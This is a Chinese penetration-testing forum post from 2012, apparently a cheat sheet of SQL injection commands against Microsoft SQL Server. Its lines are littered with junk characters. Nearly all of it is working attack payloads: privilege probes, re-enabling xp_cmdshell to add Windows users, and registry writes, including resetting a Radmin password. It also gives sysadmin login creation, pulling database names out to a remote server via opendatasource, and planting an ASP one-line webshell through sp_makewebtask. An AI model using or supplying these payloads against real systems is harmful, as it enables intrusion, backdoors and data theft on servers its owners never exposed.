中国网络渗透测试联盟

标题: 常用的一些注入命令 [打印本页]
作者: admin    时间: 2012-9-15 14:40
标题: 常用的一些注入命令
//看看是什么权限的
/ @" j- _! ?% |. S3 Qand 1=(Select IS_MEMBER('db_owner'))3 T8 t$ @4 c- ]8 p) b0 d* K, t  r6 E
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--# q) i+ R1 J, ]3 c
! o7 r: {  w! f. `6 R& w- I
//检测是否有读取某数据库的权限
& ]! l3 P3 g9 c) S: tand 1= (Select HAS_DBACCESS('master'))" R( t6 u' |+ o2 }1 G
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --4 g/ k. e0 ]$ R2 x6 I! E9 b" h
6 Y  I' Z  I. `

2 R. @; Y# J4 F0 E3 C数字类型9 g' s7 T9 K9 j8 l0 U8 Y
and char(124)%2Buser%2Bchar(124)=0, L) y& X+ z* I" C2 S( b

7 I& e# z; `; R4 M字符类型  m/ v/ q0 f5 O* K# Y
' and char(124)%2Buser%2Bchar(124)=0 and ''=', g. s: T4 v& \2 w1 o
+ K  l9 p! h4 g% U% f' }6 C0 x
搜索类型: W6 @7 t& I2 X) v5 p
' and char(124)%2Buser%2Bchar(124)=0 and '%'='2 z# ]+ @9 n, v7 e8 l0 v
+ i; j4 b$ V$ T9 w8 ~
爆用户名
! F  u; F; W  L. p) R' J- Oand user>0
3 G; v, n: B! F7 Y. }: C' and user>0 and ''='4 o  E5 @/ g1 K5 [

  H! ?' L8 N8 y2 V" z检测是否为SA权限! F) p& J) U1 l+ @( t4 _
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
: `/ ?, i9 S6 E( Z: ?, [And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --5 a+ v) T- M& y: c" l

/ N* C8 g  Q/ p3 K' d检测是不是MSSQL数据库' _+ h0 {1 k. |2 o
and exists (select * from sysobjects);--& L/ {3 N7 z. v/ m* w% q* y& s

: F3 T+ ]7 o  g) P9 Y# a0 ~检测是否支持多行# |- e! n/ S! ~8 `* J7 l* z
;declare @d int;--; q) w; K: V# h  }4 u) C& G

3 D  z1 R3 x6 ~" \6 e+ m恢复 xp_cmdshell/ Y3 H5 Y2 U* c, v  v
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
  g$ X% m. R8 y5 Z% u
6 y7 p, b+ O9 k  D% s: S* `- A+ I' _7 F0 A; ?0 v1 E
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version'): s6 j0 P/ |, d. I

$ R0 s; q: D) A" P//-----------------------7 s4 h0 ]- h) m
//       执行命令
* Q5 w" e/ @. d& @! h4 A/ G//-----------------------6 K/ l, D! r) V' q
首先开启沙盘模式:, u( S8 @+ f& m; d
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
! z: f# h# N  U* R, [# Z7 U7 N0 J2 P# r7 V7 d& L$ ^
然后利用jet.oledb执行系统命令
8 z- S3 m; o. A& P$ Vselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
4 |) H( U5 ?" ]+ ~- v
0 v: @4 m- X  w  E- z, b0 q9 e5 X% c执行命令+ E( o' M* q$ D. @- ^* ]9 L6 `
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--2 s( N/ E9 l' i% t2 c! J2 w( J
* n; e. G- P0 D: R; ]" W3 U
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
* }& F+ \& F0 S4 g/ o
( l+ Z- ^! f' B$ J+ b7 d) j判断xp_cmdshell扩展存储过程是否存在:) y$ h* P  P) g/ k% }+ O
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
7 ~1 c* k1 w* z: k( J
0 b$ w& e9 l0 |! ^写注册表
! `; S$ `8 g' texec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1: Y2 d7 Q7 A2 K; I

6 G/ ?& q; a% mREG_SZ
8 @) r- W( E: K( f1 e
. C, D, T, l5 e7 B读注册表  \; w! ~' I6 P+ d7 W% v
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'- B# P9 b$ e. U) ]7 O0 E1 B' i

% F8 d; o1 G3 h- \- F读取目录内容) l% q) Z: ?8 q8 D* U& X5 r% V
exec master..xp_dirtree 'c:\winnt\system32\',1,1
+ [9 }. ?$ {& X8 Y  ]# V0 }4 g$ ~/ c
) `3 @# Y% b! A; k
数据库备份
4 X; }* V: z' p, ^% sbackup database pubs to disk = 'c:\123.bak'
4 N/ l) {0 j6 @, q- T, o
  k: L) f/ w% Q( F  m7 }0 q//爆出长度
1 `; F0 n% t: M, AAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--; F' d0 F3 @5 a1 y0 u6 @

1 A1 Q& w/ O/ r: W0 u: t1 j  H6 F# g

0 d& y* {9 e( @; Q' l# [更改sa口令方法:用sql综合利用工具连接后,执行命令:, M$ t& b8 J" `$ f
exec sp_password NULL,'新密码','sa'
% ]" U5 l. _* J# C& Q; h* S  x9 Z" v/ }& X
添加和删除一个SA权限的用户test:! O% |4 F7 P/ |8 Q
exec master.dbo.sp_addlogin test,95307720 Z9 U: Z( T7 E* |
exec master.dbo.sp_addsrvrolemember test,sysadmin+ M+ ?0 k# s4 [
  H+ Z6 E" `# s. W# B
删除扩展存储过过程xp_cmdshell的语句:! P7 f7 x, r7 k, R! u
exec sp_dropextendedproc 'xp_cmdshell'/ G( B7 W7 U% `  M0 I7 C% J
) L. a3 m+ b; v
添加扩展存储过过程1 |4 p& b' d' w
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
" Z/ q. A' {* ^! [  \GRANT exec On xp_proxiedadata TO public- j- r, {4 n# w# N+ A1 R1 L0 _& q

! h1 k, ~) U3 ?9 b3 [+ N; Q+ Z* o* H
停掉或激活某个服务。
  d2 F) y( M+ ^7 P& O( p# D- q* Q* z
exec master..xp_servicecontrol 'stop','schedule'! e  m' K; u* Z7 A% p
exec master..xp_servicecontrol 'start','schedule'9 L1 a9 H; d% ^- q: U  Y

6 Q. I4 n- h; j! ?/ q' H% qdbo.xp_subdirs
. f( [; ^6 R/ m, K
; F7 Z" \% x6 ~, a! m只列某个目录下的子目录。
4 e9 s- Z, w" e- exp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'  \) S& W7 Q3 r. q# p8 T- M, j2 C

7 Y+ N' d( p: `5 r9 h$ Sdbo.xp_makecab
! P+ o; N( i  j+ R) Z. ^- Q) N$ d9 Y# b, a
将目标多个档案压缩到某个目标档案之内。
% q+ s# e0 v1 u0 S, _$ h所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
' [8 ]8 D/ g% w! X: N( w% S8 P& D. C* h% O3 W( z1 j
dbo.xp_makecab
8 n& y$ ~) U: A5 c# I. d7 w'c:\test.cab','mszip',1," C5 k& k& j0 M5 r1 D7 N6 ]) w, o
'C:\Inetpub\wwwroot\SQLInject\login.asp',
) f/ s1 n% t$ s( ^: j2 `; e) v+ ~- I'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
, y' u6 L2 Y( B% ~
  ^( N0 ?% M: y7 Y, Zxp_terminate_process
; V( e+ w& K. J# o
7 l# w5 c2 {; B' A  f: B停掉某个执行中的程序,但赋予的参数是 Process ID。( T- g0 d4 e% I) _% ~  H! @; V5 C
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
. u0 y5 _7 ]  {6 j3 B- [! z
. f0 I- `1 j- G! E  cxp_terminate_process 24847 m; l% n2 J; T0 u9 n/ {9 W& }
. a$ U6 t' h  p6 u7 _" v
xp_unpackcab
- P& Y7 f" x" f( h5 ?# W0 E
/ ]6 M( `! S& M7 p) n1 Z解开压缩档。0 |) t5 x; c3 L5 R
0 x" E* F( y) }2 T, g# w% h0 P# h
xp_unpackcab 'c:\test.cab','c:\temp',10 g, y* P' D0 ^: P- c, d
6 U/ G* U# y$ M1 {0 H

9 y9 ]! N( a. q& T- M, j7 M某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
: Z2 F4 w0 u# Y. j' W% Q' X, i3 v( _1 R$ N, C4 a
create database lcx;% J8 Q$ m( j( Z: ~% y% `' d/ g. N4 z
Create TABLE ku(name nvarchar(256) null);
2 V. a7 J1 o/ f6 O1 h* cCreate TABLE biao(id int NULL,name nvarchar(256) null);
, w, ]! {" |! h) I9 T. b) u
  ?% c1 I! @( N- E//得到数据库名( u& o8 {/ C3 |9 D
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases9 e9 d% |7 O0 |# t

* @) l. ?" \1 T) G" K
9 i/ l; T3 v, M: H8 x9 y1 i//在Master中创建表,看看权限怎样  z( o, r! J5 e4 a2 y1 f# h  S3 W
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
% V7 ^* e4 g: L8 K; x  |2 `, ^0 h8 Y: p: z* Y1 T6 ^
用 sp_makewebtask直接在web目录里写入一句话马:
. y9 s0 Y  z+ zhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--; }4 X, H/ a/ M( J

1 ^% K$ Z. p/ d" z2 u//更新表内容
# X" x, E! r0 w+ x; p8 I% N( RUpdate films SET kind = 'Dramatic' Where id = 123- k$ d6 d  y5 A3 k: }! H

1 e* [1 }3 f; Z: K//删除内容
  u/ T4 _( _# T9 ?delete from table_name where Stockid = 3



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2